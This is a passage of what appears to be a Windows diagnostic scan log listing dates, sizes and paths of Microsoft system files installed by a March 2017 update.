        2017-03-15 09:40 - 2017-03-04 13:15 - 01345024 _____ (Microsoft Corporation) C:\Windows\system32\srmclient.dll
        2017-03-15 09:40 - 2017-03-04 13:14 - 00588288 _____ (Microsoft Corporation) C:\Windows\system32\wlidprov.dll
        2017-03-15 09:40 - 2017-03-04 13:13 - 19411968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
        2017-03-15 09:40 - 2017-03-04 13:13 - 01217024 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Audio.dll
        2017-03-15 09:40 - 2017-03-04 13:13 - 00982528 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
        2017-03-15 09:40 - 2017-03-04 13:13 - 00858112 _____ (Microsoft Corporation) C:\Windows\system32\mprddm.dll
        2017-03-15 09:40 - 2017-03-04 13:13 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\sdshext.dll
        2017-03-15 09:40 - 2017-03-04 13:13 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\WorkFoldersGPExt.dll
        2017-03-15 09:40 - 2017-03-04 13:12 - 13085184 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
        2017-03-15 09:40 - 2017-03-04 13:12 - 00947712 _____ (Microsoft Corporation) C:\Windows\system32\MSVP9DEC.dll
        2017-03-15 09:40 - 2017-03-04 13:12 - 00805888 _____ (Microsoft Corporation) C:\Windows\system32\FrameServer.dll
        2017-03-15 09:40 - 2017-03-04 13:11 - 01891328 _____ (Microsoft Corporation) C:\Windows\system32\pnidui.dll
        2017-03-15 09:40 - 2017-03-04 13:11 - 00975872 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
        2017-03-15 09:40 - 2017-03-04 13:11 - 00821248 _____ (Microsoft Corporation) C:\Windows\system32\uDWM.dll
        2017-03-15 09:40 - 2017-03-04 13:11 - 00774656 _____ (Microsoft Corporation) C:\Windows\system32\WorkfoldersControl.dll
        2017-03-15 09:40 - 2017-03-04 13:10 - 02208768 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Graphics.Printing.3D.d ll
        2017-03-15 09:40 - 2017-03-04 13:10 - 02095616 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
        2017-03-15 09:40 - 2017-03-04 13:10 - 01917440 _____ (Microsoft Corporation) C:\Windows\system32\ActiveSyncProvider.dll
        2017-03-15 09:40 - 2017-03-04 13:10 - 01536000 _____ (Microsoft Corporation) C:\Windows\system32\SpeechPal.dll
        2017-03-15 09:40 - 2017-03-04 13:10 - 01399296 _____ (Microsoft Corporation) C:\Windows\system32\Pimstore.dll
        2017-03-15 09:40 - 2017-03-04 13:10 - 01275392 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Bluetooth.dll
        2017-03-15 09:40 - 2017-03-04 13:10 - 00971264 _____ (Microsoft Corporation) C:\Windows\system32\twinui.appcore.dll
        2017-03-15 09:40 - 2017-03-04 13:10 - 00913920 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.dll
        2017-03-15 09:40 - 2017-03-04 13:10 - 00806400 _____ (Microsoft Corporation) C:\Windows\system32\pmcsnap.dll
        2017-03-15 09:40 - 2017-03-04 13:10 - 00579072 _____ (Microsoft Corporation) C:\Windows\system32\LockAppBroker.dll
        2017-03-15 09:40 - 2017-03-04 13:09 - 08125952 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
        2017-03-15 09:40 - 2017-03-04 13:09 - 01633792 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
        2017-03-15 09:40 - 2017-03-04 13:09 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll
        2017-03-15 09:40 - 2017-03-04 13:09 - 00771072 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentApis.dll
        2017-03-15 09:40 - 2017-03-04 13:08 - 02800128 _____ (Microsoft Corporation) C:\Windows\system32\netshell.dll
        2017-03-15 09:40 - 2017-03-04 13:08 - 01780224 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
        2017-03-15 09:40 - 2017-03-04 13:08 - 00834048 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
        2017-03-15 09:40 - 2017-03-04 13:08 - 00792576 _____ (Microsoft Corporation) C:\Windows\system32\spoolsv.exe
        2017-03-15 09:40 - 2017-03-04 13:08 - 00540160 _____ (Microsoft Corporation) C:\Windows\system32\SettingSync.dll
        2017-03-15 09:40 - 2017-03-04 13:07 - 12178944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
        2017-03-15 09:40 - 2017-03-04 13:07 - 02895872 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
        2017-03-15 09:40 - 2017-03-04 13:07 - 02691072 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Logon.dll
        2017-03-15 09:40 - 2017-03-04 13:07 - 02370048 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
        2017-03-15 09:40 - 2017-03-04 13:07 - 01840640 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
        2017-03-15 09:40 - 2017-03-04 13:07 - 01513472 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
        2017-03-15 09:40 - 2017-03-04 13:07 - 01512448 _____ (Microsoft Corporation) C:\Windows\system32\UserDataService.dll
        2017-03-15 09:40 - 2017-03-04 13:07 - 01348608 _____ (Microsoft Corporation) C:\Windows\system32\wifinetworkmanager.dll
        2017-03-15 09:40 - 2017-03-04 13:07 - 00935936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srmclient.dll
        2017-03-15 09:40 - 2017-03-04 13:07 - 00909312 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Search.dll
        2017-03-15 09:40 - 2017-03-04 13:07 - 00875520 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll
        2017-03-15 09:40 - 2017-03-04 13:07 - 00774656 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Web.dll
        2017-03-15 09:40 - 2017-03-04 13:06 - 04746752 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
        2017-03-15 09:40 - 2017-03-04 13:06 - 03202048 _____ (Microsoft Corporation) C:\Windows\system32\msftedit.dll
        2017-03-15 09:40 - 2017-03-04 13:06 - 02820096 _____ (Microsoft Corporation) C:\Windows\system32\InputService.dll
        2017-03-15 09:40 - 2017-03-04 13:06 - 02475008 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
        2017-03-15 09:40 - 2017-03-04 13:06 - 02287104 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
        2017-03-15 09:40 - 2017-03-04 13:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\ntshrui.dll
        2017-03-15 09:40 - 2017-03-04 13:05 - 01328640 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Web.Http.dll
        2017-03-15 09:40 - 2017-03-04 13:05 - 00924672 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.BackgroundT ransfer.dll
        2017-03-15 09:40 - 2017-03-04 13:04 - 01826816 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
        2017-03-15 09:40 - 2017-03-04 13:04 - 00998912 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
        2017-03-15 09:40 - 2017-03-04 13:04 - 00531456 _____ (Microsoft Corporation) C:\Windows\system32\TpmCoreProvisioning.dll
        2017-03-15 09:40 - 2017-03-04 13:04 - 00433152 _____ (Microsoft Corporation) C:\Windows\system32\TextInputFramework.dll
        2017-03-15 09:40 - 2017-03-04 13:04 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\RADCUI.dll
        2017-03-15 09:40 - 2017-03-04 13:03 - 06044672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
        2017-03-15 09:40 - 2017-03-04 13:03 - 03666432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
        2017-03-15 09:40 - 2017-03-04 13:03 - 00119808 ____R (Microsoft Corporation) C:\Windows\system32\SecureAssessmentHandlers.dll
        2017-03-15 09:40 - 2017-03-04 13:02 - 00140800 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Management.Se cureAssessment.dll
        2017-03-15 09:40 - 2017-03-04 13:01 - 01493504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Wpc.dll
        2017-03-15 09:40 - 2017-03-04 13:00 - 02026496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
        2017-03-15 09:39 - 2017-03-04 14:57 - 00192352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aepic.dll
        2017-03-15 09:39 - 2017-03-04 14:35 - 01617760 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
        2017-03-15 09:39 - 2017-03-04 14:35 - 01294688 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
        2017-03-15 09:39 - 2017-03-04 14:35 - 00655200 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
        2017-03-15 09:39 - 2017-03-04 14:35 - 00590952 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
        2017-03-15 09:39 - 2017-03-04 14:35 - 00565088 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
        2017-03-15 09:39 - 2017-03-04 14:35 - 00378720 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
        2017-03-15 09:39 - 2017-03-04 14:35 - 00343904 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
        2017-03-15 09:39 - 2017-03-04 14:35 - 00315232 _____ (Microsoft Corporation) C:\Windows\system32\dcntel.dll
        2017-03-15 09:39 - 2017-03-04 14:35 - 00242528 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
        2017-03-15 09:39 - 2017-03-04 14:35 - 00142176 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
        2017-03-15 09:39 - 2017-03-04 14:35 - 00086368 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
        2017-03-15 09:39 - 2017-03-04 14:35 - 00038240 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCensus.exe
        2017-03-15 09:39 - 2017-03-04 14:27 - 02170720 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystems64.dll
        2017-03-15 09:39 - 2017-03-04 14:25 - 01117024 _____ (Microsoft Corporation) C:\Windows\system32\ReAgent.dll
        2017-03-15 09:39 - 2017-03-04 14:24 - 01051112 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
        2017-03-15 09:39 - 2017-03-04 14:24 - 00894096 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
        2017-03-15 09:39 - 2017-03-04 14:24 - 00354264 _____ (Microsoft Corporation) C:\Windows\system32\systemreset.exe
        2017-03-15 09:39 - 2017-03-04 14:22 - 01354312 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
        2017-03-15 09:39 - 2017-03-04 14:22 - 01172984 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
        2017-03-15 09:39 - 2017-03-04 14:21 - 02255712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
        2017-03-15 09:39 - 2017-03-04 14:20 - 00379744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys
        2017-03-15 09:39 - 2017-03-04 14:20 - 00128352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys
        2017-03-15 09:39 - 2017-03-04 14:19 - 02681200 _____ C:\Windows\system32\CoreUIComponents.dll
        2017-03-15 09:39 - 2017-03-04 14:18 - 00764392 _____ (Microsoft Corporation) C:\Windows\system32\CoreMessaging.dll
        2017-03-15 09:39 - 2017-03-04 14:15 - 00404320 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
        2017-03-15 09:39 - 2017-03-04 14:13 - 00635456 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
        2017-03-15 09:39 - 2017-03-04 14:11 - 00328008 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Storage.ApplicationDat a.dll
        2017-03-15 09:39 - 2017-03-04 14:11 - 00266544 _____ (Microsoft Corporation) C:\Windows\system32\policymanager.dll
        2017-03-15 09:39 - 2017-03-04 14:09 - 00578392 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncHost.exe
        2017-03-15 09:39 - 2017-03-04 14:09 - 00402272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
        2017-03-15 09:39 - 2017-03-04 14:09 - 00178520 _____ (Microsoft Corporation) C:\Windows\system32\CloudExperienceHostUser.dll
        2017-03-15 09:39 - 2017-03-04 14:08 - 00624048 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
        2017-03-15 09:39 - 2017-03-04 14:08 - 00509280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
        2017-03-15 09:39 - 2017-03-04 14:08 - 00342456 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
        2017-03-15 09:39 - 2017-03-04 14:07 - 02913144 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
        2017-03-15 09:39 - 2017-03-04 14:07 - 02446704 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
        2017-03-15 09:39 - 2017-03-04 14:07 - 01267512 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
        2017-03-15 09:39 - 2017-03-04 14:07 - 01100128 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe
        2017-03-15 09:39 - 2017-03-04 14:07 - 00989016 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe
        2017-03-15 09:39 - 2017-03-04 14:07 - 00947552 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.efi
        2017-03-15 09:39 - 2017-03-04 14:07 - 00811872 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.exe
        2017-03-15 09:39 - 2017-03-04 14:07 - 00682808 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
        2017-03-15 09:39 - 2017-03-04 14:07 - 00116064 _____ (Microsoft Corporation) C:\Windows\system32\icfupgd.dll
        2017-03-15 09:39 - 2017-03-04 14:07 - 00110944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hvsocket.sys
        2017-03-15 09:39 - 2017-03-04 14:07 - 00080224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vmbkmcl.sys
        2017-03-15 09:39 - 2017-03-04 14:03 - 04674360 _____ (Microsoft Corporation) C:\Windows\explorer.exe
        2017-03-15 09:39 - 2017-03-04 14:03 - 01600632 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
        2017-03-15 09:39 - 2017-03-04 14:03 - 00424616 _____ (Microsoft Corporation) C:\Windows\system32\MFPlay.dll
        2017-03-15 09:39 - 2017-03-04 14:03 - 00241496 _____ (Microsoft Corporation) C:\Windows\system32\CloudExperienceHost.dll
        2017-03-15 09:39 - 2017-03-04 14:03 - 00038768 _____ (Microsoft Corporation) C:\Windows\system32\CompPkgSup.dll
        2017-03-15 09:39 - 2017-03-04 14:01 - 00201568 _____ (Microsoft Corporation) C:\Windows\system32\basecsp.dll
        2017-03-15 09:39 - 2017-03-04 14:01 - 00128648 _____ (Microsoft Corporation) C:\Windows\system32\gpapi.dll
        2017-03-15 09:39 - 2017-03-04 13:59 - 01570208 _____ (Microsoft Corporation) C:\Windows\system32\gdi32full.dll
        2017-03-15 09:39 - 2017-03-04 13:58 - 01416224 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
        2017-03-15 09:39 - 2017-03-04 13:58 - 00628552 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
        2017-03-15 09:39 - 2017-03-04 13:58 - 00322912 _____ (Microsoft Corporation) C:\Windows\system32\input.dll
        2017-03-15 09:39 - 2017-03-04 13:57 - 00372432 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.MediaControl.dll
        2017-03-15 09:39 - 2017-03-04 13:42 - 07216640 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
        2017-03-15 09:39 - 2017-03-04 13:37 - 00025088 _____ C:\Windows\system32\GamePanelExternalHook.dll
        2017-03-15 09:39 - 2017-03-04 13:36 - 00217600 _____ (Microsoft Corporation) C:\Windows\system32\msctfp.dll
        2017-03-15 09:39 - 2017-03-04 13:36 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
        2017-03-15 09:39 - 2017-03-04 13:36 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\LaunchWinApp.exe
        2017-03-15 09:39 - 2017-03-04 13:36 - 00027136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mskssrv.sys
        2017-03-15 09:39 - 2017-03-04 13:35 - 00047616 _____ (Microsoft Corporation) C:\Windows\system32\ddrawex.dll
        2017-03-15 09:39 - 2017-03-04 13:34 - 00124416 _____ (Microsoft Corporation) C:\Windows\system32\Windows.System.SystemManagemen t.dll
        2017-03-15 09:39 - 2017-03-04 13:34 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\msctfui.dll
        2017-03-15 09:39 - 2017-03-04 13:34 - 00080896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vmbkmclr.sys
        2017-03-15 09:39 - 2017-03-04 13:34 - 00078848 _____ (Microsoft Corporation) C:\Windows\system32\dggpext.dll
        2017-03-15 09:39 - 2017-03-04 13:33 - 00259072 _____ (Microsoft Corporation) C:\Windows\system32\Family.SyncEngine.dll
        2017-03-15 09:39 - 2017-03-04 13:33 - 00185344 _____ (Microsoft Corporation) C:\Windows\system32\DisplayManager.dll
        2017-03-15 09:39 - 2017-03-04 13:33 - 00162304 _____ (Microsoft Corporation) C:\Windows\system32\dmcertinst.exe
        2017-03-15 09:39 - 2017-03-04 13:33 - 00095232 _____ (Microsoft Corporation) C:\Windows\system32\tzautoupdate.dll
        2017-03-15 09:39 - 2017-03-04 13:33 - 00057344 _____ (Microsoft Corporation) C:\Windows\system32\BluetoothDesktopHandlers.dll
        2017-03-15 09:39 - 2017-03-04 13:33 - 00046592 _____ (Microsoft Corporation) C:\Windows\system32\XInputUap.dll
        2017-03-15 09:39 - 2017-03-04 13:33 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\tbauth.dll
        2017-03-15 09:39 - 2017-03-04 13:32 - 00249856 _____ (Microsoft Corporation) C:\Windows\system32\scksp.dll
        2017-03-15 09:39 - 2017-03-04 13:32 - 00196096 _____ (Microsoft Corporation) C:\Windows\system32\UserDeviceRegistration.dll
        2017-03-15 09:39 - 2017-03-04 13:32 - 00193536 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.WiFi.dll
        2017-03-15 09:39 - 2017-03-04 13:32 - 00133632 _____ (Microsoft Corporation) C:\Windows\system32\MediaFoundation.DefaultPercept ionProvider.dll
        2017-03-15 09:39 - 2017-03-04 13:32 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryBroker. dll
        2017-03-15 09:39 - 2017-03-04 13:31 - 00567296 _____ (Microsoft Corporation) C:\Windows\system32\DevicePairing.dll
        2017-03-15 09:39 - 2017-03-04 13:31 - 00280064 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_WorkAccess.dl l
        2017-03-15 09:39 - 2017-03-04 13:31 - 00247808 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
        2017-03-15 09:39 - 2017-03-04 13:31 - 00122880 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryClient. dll
        2017-03-15 09:39 - 2017-03-04 13:30 - 00547840 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Gaming.Input.dll
        2017-03-15 09:39 - 2017-03-04 13:30 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\daxexec.dll
        2017-03-15 09:39 - 2017-03-04 13:30 - 00300544 _____ (Microsoft Corporation) C:\Windows\system32\mscandui.dll
        2017-03-15 09:39 - 2017-03-04 13:30 - 00236544 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Flights.dll
        2017-03-15 09:39 - 2017-03-04 13:30 - 00231424 _____ (Microsoft Corporation) C:\Windows\system32\shutdownux.dll
        2017-03-15 09:39 - 2017-03-04 13:30 - 00205824 _____ (Microsoft Corporation) C:\Windows\system32\netiohlp.dll
        2017-03-15 09:39 - 2017-03-04 13:30 - 00186368 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Radios.dll
        2017-03-15 09:39 - 2017-03-04 13:30 - 00180224 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Cortana.OneCore.dll
        2017-03-15 09:39 - 2017-03-04 13:30 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Shell.Search.UriHandle r.dll
        2017-03-15 09:39 - 2017-03-04 13:30 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\TokenBrokerCookies.exe
        2017-03-15 09:39 - 2017-03-04 13:29 - 00505856 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.WiFiDirect.dll
        2017-03-15 09:39 - 2017-03-04 13:29 - 00418304 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.BlockedShutdown.dll
        2017-03-15 09:39 - 2017-03-04 13:29 - 00343552 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.SmartCards.Pho ne.dll
        2017-03-15 09:39 - 2017-03-04 13:29 - 00289792 _____ (Microsoft Corporation) C:\Windows\system32\DeveloperOptionsSettingsHandle rs.dll
        2017-03-15 09:39 - 2017-03-04 13:29 - 00171520 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.SerialCommunic ation.dll
        2017-03-15 09:39 - 2017-03-04 13:29 - 00156672 _____ (Microsoft Corporation) C:\Windows\system32\BrowserSettingSync.dll
        2017-03-15 09:39 - 2017-03-04 13:29 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
        2017-03-15 09:39 - 2017-03-04 13:28 - 00947712 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettings.Handlers.dll
        2017-03-15 09:39 - 2017-03-04 13:28 - 00651264 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.AllJoyn.dll
        2017-03-15 09:39 - 2017-03-04 13:28 - 00623104 _____ (Microsoft Corporation) C:\Windows\system32\PCPTpm12.dll
        2017-03-15 09:39 - 2017-03-04 13:28 - 00394752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ks.sys
        2017-03-15 09:39 - 2017-03-04 13:28 - 00349696 _____ (Microsoft Corporation) C:\Windows\system32\icsvcext.dll
        2017-03-15 09:39 - 2017-03-04 13:28 - 00279552 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.HumanInterface Device.dll
        2017-03-15 09:39 - 2017-03-04 13:28 - 00268800 _____ (Microsoft Corporation) C:\Windows\system32\UserMgrProxy.dll
        2017-03-15 09:39 - 2017-03-04 13:28 - 00267264 _____ (Microsoft Corporation) C:\Windows\system32\vaultcli.dll
        2017-03-15 09:39 - 2017-03-04 13:28 - 00223744 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.HostName.dl l
        2017-03-15 09:39 - 2017-03-04 13:28 - 00193536 _____ (Microsoft Corporation) C:\Windows\system32\certprop.dll
        2017-03-15 09:39 - 2017-03-04 13:28 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
        2017-03-15 09:39 - 2017-03-04 13:27 - 00852480 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Import.dll
        2017-03-15 09:39 - 2017-03-04 13:27 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\WpAXHolder.dll
        2017-03-15 09:39 - 2017-03-04 13:27 - 00391168 _____ (Microsoft Corporation) C:\Windows\system32\oleacc.dll
        2017-03-15 09:39 - 2017-03-04 13:27 - 00379392 _____ (Microsoft Corporation) C:\Windows\system32\apprepsync.dll
        2017-03-15 09:39 - 2017-03-04 13:27 - 00324608 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.LockS creen.dll
        2017-03-15 09:39 - 2017-03-04 13:27 - 00311296 _____ (Microsoft Corporation) C:\Windows\system32\SyncSettings.dll
        2017-03-15 09:39 - 2017-03-04 13:27 - 00252928 _____ (Microsoft Corporation) C:\Windows\system32\ubpm.dll
        2017-03-15 09:39 - 2017-03-04 13:27 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\apprepapi.dll
        2017-03-15 09:39 - 2017-03-04 13:26 - 00643072 _____ (Microsoft Corporation) C:\Windows\system32\main.cpl
        2017-03-15 09:39 - 2017-03-04 13:26 - 00579072 _____ (Microsoft Corporation) C:\Windows\system32\ddraw.dll
        2017-03-15 09:39 - 2017-03-04 13:26 - 00464896 _____ (Microsoft Corporation) C:\Windows\system32\msutb.dll
        2017-03-15 09:39 - 2017-03-04 13:26 - 00450048 _____ (Microsoft Corporation) C:\Windows\system32\werui.dll
        2017-03-15 09:39 - 2017-03-04 13:26 - 00407552 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Management.dl l
        2017-03-15 09:39 - 2017-03-04 13:26 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Picker.dll
        2017-03-15 09:39 - 2017-03-04 13:26 - 00264704 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
        2017-03-15 09:39 - 2017-03-04 13:26 - 00261632 _____ (Microsoft Corporation) C:\Windows\system32\indexeddbserver.dll
        2017-03-15 09:39 - 2017-03-04 13:26 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\updatepolicy.dll
        2017-03-15 09:39 - 2017-03-04 13:26 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Shell.dll
        2017-03-15 09:39 - 2017-03-04 13:25 - 01060352 _____ (Microsoft Corporation) C:\Windows\system32\AppContracts.dll
        2017-03-15 09:39 - 2017-03-04 13:25 - 01016320 _____ (Microsoft Corporation) C:\Windows\system32\XblAuthManager.dll
        2017-03-15 09:39 - 2017-03-04 13:25 - 00526848 _____ (Microsoft Corporation) C:\Windows\system32\OneDriveSettingSyncProvider.dl l
        2017-03-15 09:39 - 2017-03-04 13:24 - 01092096 _____ (Microsoft Corporation) C:\Windows\system32\ApplicationFrame.dll
        2017-03-15 09:39 - 2017-03-04 13:24 - 00956416 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.deskt op.dll
        2017-03-15 09:39 - 2017-03-04 13:24 - 00655872 _____ (Microsoft Corporation) C:\Windows\system32\sud.dll
        2017-03-15 09:39 - 2017-03-04 13:24 - 00560128 _____ (Microsoft Corporation) C:\Windows\system32\AppReadiness.dll
        2017-03-15 09:39 - 2017-03-04 13:24 - 00495104 _____ (Microsoft Corporation) C:\Windows\system32\DataSenseHandlers.dll
        2017-03-15 09:39 - 2017-03-04 13:24 - 00478208 _____ (Microsoft Corporation) C:\Windows\system32\DXP.dll
        2017-03-15 09:39 - 2017-03-04 13:24 - 00329728 _____ (Microsoft Corporation) C:\Windows\system32\deviceaccess.dll
        2017-03-15 09:39 - 2017-03-04 13:23 - 03753984 _____ (Microsoft Corporation) C:\Windows\system32\bootux.dll
        2017-03-15 09:39 - 2017-03-04 13:23 - 00896512 _____ (Microsoft Corporation) C:\Windows\system32\Windows.AccountsControl.dll
        2017-03-15 09:39 - 2017-03-04 13:23 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\GamePanel.exe
        2017-03-15 09:39 - 2017-03-04 13:23 - 00715776 _____ (Microsoft Corporation) C:\Windows\system32\wcmsvc.dll
        2017-03-15 09:39 - 2017-03-04 13:23 - 00634368 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
        2017-03-15 09:39 - 2017-03-04 13:23 - 00541696 _____ (Microsoft Corporation) C:\Windows\system32\ipnathlp.dll
        2017-03-15 09:39 - 2017-03-04 13:23 - 00496128 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettings.UserAccountsHan dlers.dll
        2017-03-15 09:39 - 2017-03-04 13:23 - 00320512 _____ (Microsoft Corporation) C:\Windows\system32\thumbcache.dll
        2017-03-15 09:39 - 2017-03-04 13:22 - 00869888 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
        2017-03-15 09:39 - 2017-03-04 13:22 - 00822784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakradiag.dll
        2017-03-15 09:39 - 2017-03-04 13:22 - 00410112 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
        2017-03-15 09:39 - 2017-03-04 13:21 - 00776192 _____ (Microsoft Corporation) C:\Windows\system32\TabletPC.cpl
        2017-03-15 09:39 - 2017-03-04 13:21 - 00347648 _____ (Microsoft Corporation) C:\Windows\system32\rascustom.dll
        2017-03-15 09:39 - 2017-03-04 13:20 - 01913856 _____ (Microsoft Corporation) C:\Windows\system32\wsp_fs.dll
        2017-03-15 09:39 - 2017-03-04 13:20 - 01361408 _____ (Microsoft Corporation) C:\Windows\system32\SharedStartModel.dll
        2017-03-15 09:39 - 2017-03-04 13:20 - 00893952 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
        2017-03-15 09:39 - 2017-03-04 13:20 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
        2017-03-15 09:39 - 2017-03-04 13:20 - 00203776 _____ (Microsoft Corporation) C:\Windows\system32\AppXApplicabilityBlob.dll
        2017-03-15 09:39 - 2017-03-04 13:19 - 01584128 _____ (Microsoft Corporation) C:\Windows\system32\wsp_health.dll
        2017-03-15 09:39 - 2017-03-04 13:19 - 00635904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
